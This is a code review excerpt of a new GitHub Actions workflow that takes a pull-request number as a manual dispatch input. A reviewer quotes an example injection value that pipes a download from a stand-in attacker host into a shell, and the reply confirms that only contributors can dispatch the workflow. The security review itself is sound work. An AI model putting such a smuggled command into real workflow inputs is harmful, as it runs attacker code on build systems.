.github/workflows/auto-review-trigger.yml

```diff
@@ -0,0 +1,66 @@
+on:
+  pull_request_target:
+    types:
+      - opened
+      - reopened
+      - synchronize
+  pull_request_review:
+    types:
+      - submitted
+      - dismissed
+  workflow_dispatch:
+    inputs:
+      pr_number:
+        description: Pull Request Number
+        type: string
+        required: true
```

Comment:
I assume only contributors can dispatch a workflow? I'd be concerned about setting `pr_number` to something like `$(curl https://attack.invalid/ | sh)`.

Reply:
This is correct.